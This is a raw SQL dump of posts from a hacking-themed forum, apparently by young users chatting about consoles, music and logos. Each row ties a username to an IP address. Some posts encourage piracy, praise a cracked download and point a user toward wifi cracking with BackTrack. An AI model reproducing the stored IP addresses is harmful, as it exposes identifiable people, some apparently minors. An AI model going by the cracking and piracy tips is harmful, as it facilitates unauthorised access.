`replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4433', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '257', 'XxTREYZxX', '1350119804', 'wow thanks so much i didnt know that luckily', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '501fa9dcd32dde261bc9eb12134ea324', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4434', '226', '919', '11', 'RE: A Newbies Guide', '0', '257', 'XxTREYZxX', '1350119923', 'brilliant HQ post keep up the good work', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'c209a2c3223e217cbd84e19faa284a6d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4435', '848', '0', '12', 'can someone teach me how to hack a wifi connection', '11', '257', 'XxTREYZxX', '1350120079', 'hey i was just wondering if someone can teach me how to hack a wifi connection thank you', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'fb30084cb357a28ea2432a2059c5e2ef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4436', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '257', 'XxTREYZxX', '1350120159', 'i will stick to ps3 and money doesnt bother me but thanks for sharing', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '84922d643d96f7e44f02bed71cea6ac5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4437', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '254', 'Greed', '1350120241', 'lol they don\'t cost over 100 dollars, it like 60, I don\'t really encourage pirated games on the consoles, but i do love em on the pc.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'eb8baa95a5d3e1ca82a5d245a33810fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4438', '827', '4326', '76', 'RE: Playstation names', '0', '254', 'Greed', '1350120367', 'lol lazy are ya, mate! lol I can do that no sweat and im lazy too, even I work and still manage to do it!', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '144dfc00b4c046bb28808eed77a3ca12', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4439', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '257', 'XxTREYZxX', '1350120380', 'yeah true but money does not bother me much', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '650c83a4c67c93c290ec158f84ce926f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4440', '827', '4326', '76', 'RE: Playstation names', '0', '257', 'XxTREYZxX', '1350120474', 'nah im just lazy now .lol', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '038fbad27b0374bfed37cb19c3b01738', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4441', '827', '4326', '76', 'RE: Playstation names', '0', '254', 'Greed', '1350120544', 'lol good for yeah! fun being lazy isn\'t it! but really add me soon.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '32caaf9d4ce17420308bbc87a75c7541', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4442', '846', '4420', '74', 'RE: another great pvp', '0', '254', 'Greed', '1350120629', 'Err I don\'t see anything here? is suppose to be like that?', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '635606a0a6830226e65aee7800e97f6b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4443', '845', '4437', '72', 'RE: whats better ps3 or xbox', '0', '258', 'PiXEL^OG', '1350120635', '[quote=\'Greed\' pid=\'4437\' dateline=\'1350120241\'] lol they don\'t cost over 100 dollars, it like 60, I don\'t really encourage pirated games on the consoles, but i do love em on the pc. [/quote] Your name is Greed yet you like to PAY for games? Seems legit :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '69b235972b7adcadf49ae1ad4d9ab8fe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4444', '190', '665', '56', 'RE: Copy and paste game', '0', '257', 'XxTREYZxX', '1350120679', 'my hotmail acount that i copied', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '3a65f780ae8150603a3670d27c0b23a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4445', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '254', 'Greed', '1350121093', 'you see here, I like games, I like every single game, but how is that possible well I\'ll tell ya how, by buying games and supporting the makers, and it easy to do! I can get money by doing work, Hell I want money and games and everything.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '8fa67bc6d33d9381cfda8b573b0febac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4446', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '257', 'XxTREYZxX', '1350121173', 'yeah it doesnt mean he is greed (or is he) lol', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '5e68518485f2767101a415d702100702', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4447', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '254', 'Greed', '1350121230', 'Getting money, getting more money, and even getting more money then how much money I can get! My future plan involves everything I can get, even the ladies!', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'e0659f5c3e8f2291214291e21cbfe983', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4448', '846', '4420', '74', 'RE: another great pvp', '0', '257', 'XxTREYZxX', '1350121339', 'there edited sorry i completely forgot', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '1f1d1a5d1bc2296d111d3a1a58e07fcf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4449', '827', '4326', '76', 'RE: Playstation names', '0', '257', 'XxTREYZxX', '1350121424', 'yeah i will try tommorow because we are going somewhere i dont even know where.', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '1f152940af9d15823de1ea8560acda07', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4450', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '254', 'Greed', '1350121452', 'Greed, yes I am Greed I take what you want in live and make it bigger, better, and most importantly MINE! So you ask yourself are you better then Greed? Well no, because I always one step ahead.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '71ee4e9f0bcccd600efa25fe91c23f61', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4451', '840', '4390', '4', 'RE: Its andrew', '0', '257', 'XxTREYZxX', '1350121986', 'welcome my fellow freind to the one and only L33THACKING.NET', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '7b12eaac1a842a46e00b664f5aa612a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4506', '3', '4504', '19', 'RE: Official Site Rules', '0', '62', 'R?????zo?', '1350153751', '[quote=\'NXK\' pid=\'4504\' dateline=\'1350152885\'] So you copy and pasted Hack forums rules, Literally word for word. Wow that doesn\'t make us look like a bunch of leechers. [/quote] I was thinking exactly the same thing, makes us look unprofessional.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'eed92d2a96830c21068617cb2c20fb7b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4453', '833', '4375', '3', 'RE: New feature coming up!', '0', '257', 'XxTREYZxX', '1350122714', 'this would be a great addition to the site', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '229f399987e2045b6dd93b7f19e7984f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4454', '845', '4450', '72', 'RE: whats better ps3 or xbox', '0', '258', 'PiXEL^OG', '1350123830', '[quote=\'Greed\' pid=\'4450\' dateline=\'1350121452\'] Greed, yes I am Greed I take what you want in live and make it bigger, better, and most importantly MINE! So you ask yourself are you better then Greed? Well no, because I always one step ahead. [/quote] LMAO yeah right im sure u are :roflol: I get like 500 dollars on my File ice like every 1 month , also im like 14 so i can\'t be bothered wasting my money on Gamestop Though i do agree , supporting developers is important so they can make more epic games in the future but ill let you pay them for me :) Also its spelled \"Im always one step ahead\" Not \"i always one step ahead\" I can see you need ALOT of work on your English so im 500 steps ahead of you in English :D', '139.190.235.246', '-1950422026', '0', '0', '258', '1350124108', '1', '48538a1065ca4715e08f534f12338270', '0', '1350124108'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4455', '833', '4375', '3', 'RE: New feature coming up!', '0', '53', 'sirchamp', '1350124076', 'That would be something that would make this site really unique', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '62af7a0841c447db2e4f554342389b59', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4456', '842', '4432', '71', 'RE: Assasins creed 3', '0', '258', 'PiXEL^OG', '1350124214', '[quote=\'treyz123456789\' pid=\'4432\' dateline=\'1350119532\'] hmmm dear lol and yer i will do the first mission first duh [/quote] Well then this thread is pointless', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'eebf853fbf4d7d978d6766f9fc358148', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4457', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '257', 'XxTREYZxX', '1350124394', 'thats not a nice reply hes only joking . [hr] and 500 can you teach me how to do that', '203.104.11.2', '-882373886', '1', '0', '257', '1350124441', '1', '6559518f304ff87986605e601cecbf67', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4458', '845', '4454', '72', 'RE: whats better ps3 or xbox', '0', '254', 'Greed', '1350124461', '[quote=\'XTr3ME PiX3L\' pid=\'4454\' dateline=\'1350123830\'] [quote=\'Greed\' pid=\'4450\' dateline=\'1350121452\'] Greed, yes I am Greed I take what you want in live and make it bigger, better, and most importantly MINE! So you ask yourself are you better then Greed? Well no, because I always one step ahead. [/quote] LMAO yeah right im sure u are :roflol: I get like 500 dollars on my File ice like every 1 month , also im like 14 so i can\'t be bothered wasting my money on Gamestop Though i do agree , supporting developers is important so they can make more epic games in the future but ill let you pay them for me :) Also its spelled \"Im always one step ahead\" Not \"i always one step ahead\" I can see you need ALOT of work on your English so im 500 steps ahead of you in English :D [/quote] lol who cares about if you make 500 dollars on some site, and who care how old you are, and then who cares about my english and what not, I don\'t have time to correct my grammer. If you have time then go ahead lol waste your time. now let\'s stay on topic okay? So yeah I do believe that the graphics are better on the ps3 and that the xbox is lame because you have oversized controllers and have to pay for the online.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '2b54252ac8d3c8a0da16a60e199e4107', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4459', '845', '4457', '72', 'RE: whats better ps3 or xbox', '0', '258', 'PiXEL^OG', '1350124590', '[quote=\'treyz123456789\' pid=\'4457\' dateline=\'1350124394\'] thats not a nice reply hes only joking . [hr] and 500 can you teach me how to do that [/quote] Really? O im sorry I thought he was being serious. Again Sorry everyone [hr] [quote=\'Greed\' pid=\'4458\' dateline=\'1350124461\'] [quote=\'XTr3ME PiX3L\' pid=\'4454\' dateline=\'1350123830\'] [quote=\'Greed\' pid=\'4450\' dateline=\'1350121452\'] Greed, yes I am Greed I take what you want in live and make it bigger, better, and most importantly MINE! So you ask yourself are you better then Greed? Well no, because I always one step ahead. [/quote] LMAO yeah right im sure u are :roflol: I get like 500 dollars on my File ice like every 1 month , also im like 14 so i can\'t be bothered wasting my money on Gamestop Though i do agree , supporting developers is important so they can make more epic games in the future but ill let you pay them for me :) Also its spelled \"Im always one step ahead\" Not \"i always one step ahead\" I can see you need ALOT of work on your English so im 500 steps ahead of you in English :D [/quote] lol who cares about if you make 500 dollars on some site, and who care how old you are, and then who cares about my english and what not, I don\'t have time to correct my grammer. If you have time then go ahead lol waste your time. now let\'s stay on topic okay? So yeah I do believe that the graphics are better on the ps3 and that the xbox is lame because you have oversized controllers and have to pay for the online. [/quote] Actually Xbox 360 has a faster frame rate than PS3 As for graphics i agree', '139.190.235.246', '-1950422026', '0', '0', '258', '1350124813', '1', 'eed1762c68bcfbdddc8c1722f8124d5a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4460', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '254', 'Greed', '1350124907', 'yeah, lol If I were the real Greed would you think I would be here. I would be trying to take the world, getting all the money, getting everything I could. Now stay on topic lol', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '457057c22b32a8053e83b0ec55d3ca25', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4461', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '257', 'XxTREYZxX', '1350124996', 'yeah 100 dollars for 12 months and for ps3 i have like 4 account one for pissing people off, one for prestiging and one for hacking its so much more fun', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'eeef789e22843a4be8bbbc1c0c796d53', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4462', '842', '4400', '71', 'RE: Assasins creed 3', '0', '254', 'Greed', '1350125058', 'Well not really, I wanted to know who pre ordered it and what Would you do first when your in the game, when your not doing the first mission.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '3ec22658411770d5d16696cf81efea65', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4463', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '254', 'Greed', '1350125223', 'yeah if you hack on the ps3, I\'m going to troll you until you DIE! lol no hacking like I said it not fun for other people and well for pissing people off, now thats fun lol', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '003a023277bc22c63b25785d7a6ff3c4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4464', '845', '4461', '72', 'RE: whats better ps3 or xbox', '0', '258', 'PiXEL^OG', '1350125297', '[quote=\'treyz123456789\' pid=\'4461\' dateline=\'1350124996\'] yeah 100 dollars for 12 months and for ps3 i have like 4 account one for pissing people off, one for prestiging and one for hacking its so much more fun [/quote] The hole Xbox live thing is Annoying to pay for but if you have Xbox 360 elite then you can make fake accounts and each account has 1 month free XBL gold so if you run out then just make a new one. Also you can play Pirated games online on Xbox , you can\'t do the same on PS3 but for people who don\'t have alot of money they can buy an Xbox', '139.190.235.246', '-1950422026', '0', '0', '258', '1350125328', '1', '3c5b827a197ba2744b63fdb00c3e0b1e', '0', '1350125328'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4465', '842', '4400', '71', 'RE: Assasins creed 3', '0', '257', 'XxTREYZxX', '1350125367', 'true i pre odered it last week or so', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'c914425dabba42c44fd51a648248ed35', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4466', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '257', 'XxTREYZxX', '1350125559', 'yeah thats actually a smrt idea [hr] yeah but i only hack for single player like special ops and campaign.', '203.104.11.2', '-882373886', '1', '0', '257', '1350125643', '1', '2102b2ea104e716991cc57ad87705629', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4467', '840', '4390', '4', 'RE: Its andrew', '0', '258', 'PiXEL^OG', '1350126530', 'Welcome to L33t hacking , Enjoy your stay and hope you learn something :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '6c61f8e3793d6905678ca22e5092327e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4468', '849', '0', '73', 'when did you buy your ipod', '0', '257', 'XxTREYZxX', '1350126710', 'when did you buy your ipod', '203.104.11.2', '-882373886', '1', '0', '1', '1350153718', '1', '275531c2e44d650be6b15acb3138478e', '0', '1350153718'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4573', '619', '3008', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '257', 'XxTREYZxX', '1350186464', 'i did now haha gotcha i reped i wasnt a elite member lol', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', 'dc0748e35e124d09e2926ec1bfdd394a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4469', '849', '4468', '73', 'RE: when did you buy you ipod', '0', '258', 'PiXEL^OG', '1350127371', 'I bought my Ipod touch 4g when it came out in November or was it October 2010', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '4187adda90fcd95a5b3b98522d2e71d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4470', '849', '4468', '73', 'RE: when did you buy you ipod', '0', '257', 'XxTREYZxX', '1350127797', 'i bought my ipod 4g for christmas', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', 'b466b5e70e8578745edad2f7690bcf3f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4471', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '257', 'XxTREYZxX', '1350128328', 'i listen to dubstep,hip,hop and rap', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', '5bf988d080920062e1edd5903733c10e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4472', '848', '4435', '12', 'RE: can someone teach me how to hack a wifi connection', '0', '205', 'mothered', '1350129556', 'Your best option Is to Install BackTrack. It has all the tools pre-Installed. Getting Into a WEP network Is very easy. It takes me on average around 10 minutes. Since most encrypted Networks have WPA/WPA2/WPAPSK, you can have a look at this guide: http://www.securitytube.net/video/3971 First and foremost, you do need a compatible wireless card/chipset.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '50e449ed1ca883479a779ab8c7dfa4c8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4473', '836', '4385', '30', 'RE: Internet Download Manager [IDM] v6.12.22 + crack + skin', '0', '205', 'mothered', '1350129715', 'I have this via another source, and It\'s a pretty good little tool, that does serve It\'s purpose. Nice one mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '49453f739c71bfaaa3783eef73d6db26', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4474', '517', '2564', '34', 'RE: Spiderman Signature Tutorial', '0', '257', 'XxTREYZxX', '1350130058', 'thats a great tutorial keep up the good work as you always do', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '4afae59026514d05e72e6e30f1a154ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4475', '153', '401', '34', 'RE: [TUT] How to Render SMOKE and FIRE in Seconds', '0', '257', 'XxTREYZxX', '1350130517', 'thats great. it looks sexy as, lol', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '701025aab1bb558561c9def0e3d54f6c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4476', '101', '241', '34', 'RE: [tut]Glossy Logo', '0', '257', 'XxTREYZxX', '1350130813', 'nice tutorial and keep it up', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '79becf053202e7beb56c62fcbce72254', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4477', '848', '4435', '12', 'RE: can someone teach me how to hack a wifi connection', '0', '257', 'XxTREYZxX', '1350131591', 'thank you for all the help considering you are the first one to comment.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'bcc7d739bcd8e433dd22da1079657d4e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4478', '850', '0', '63', 'anyone interested in making me a logo', '0', '257', 'XxTREYZxX', '1350132531', 'anyone interested in making me a logo for free i would really like to have one made for me, thankyou', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '63f05fbbfcf2906f0bde5ed148b0c5a3', '0', 